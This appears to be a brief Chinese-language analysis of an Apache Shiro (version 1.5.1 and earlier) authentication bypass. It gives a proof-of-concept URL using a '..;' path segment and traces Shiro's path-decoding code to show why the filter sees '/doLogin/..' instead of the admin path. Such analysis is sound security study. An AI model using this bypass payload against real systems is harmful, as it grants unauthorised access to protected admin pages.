shiro版本<=1.5.1
POC:
http://192.168.174.1:8081/doLogin/..;/admin/page
在org/apache/shiro/web/filter/mgt/PathMatchingFilterChainResolver.java的getChain()方法里面:
String requestURI = getPathWithinApplication(request);跟进getPathWithinApplication():
public static String getPathWithinApplication(HttpServletRequest request) {
String contextPath = getContextPath(request);
String requestUri = getRequestUri(request);
if (StringUtils.startsWithIgnoreCase(requestUri, contextPath)) {
// Normal case: URI contains context path.
String path = requestUri.substring(contextPath.length());
return (StringUtils.hasText(path) ? path : "/");
} else {
// Special case: rather unusual.
return requestUri;
}
}跟进getRequestUri():
public static String getRequestUri(HttpServletRequest request) {
String uri = (String) request.getAttribute(INCLUDE_REQUEST_URI_ATTRIBUTE);
if (uri == null) {
uri = request.getRequestURI();
}
return normalize(decodeAndCleanUriString(request, uri));
}还是熟悉的那两个函数,decodeAndCleanUriString和normalize。
private static String decodeAndCleanUriString(HttpServletRequest request, String uri) {
uri = decodeRequestString(request, uri);
int semicolonIndex = uri.indexOf(';');
return (semicolonIndex != -1 ? uri.substring(0, semicolonIndex) : uri);
}先url解码然后分割,后面懂得都懂了。
Shiro得到的是/doLogin/..。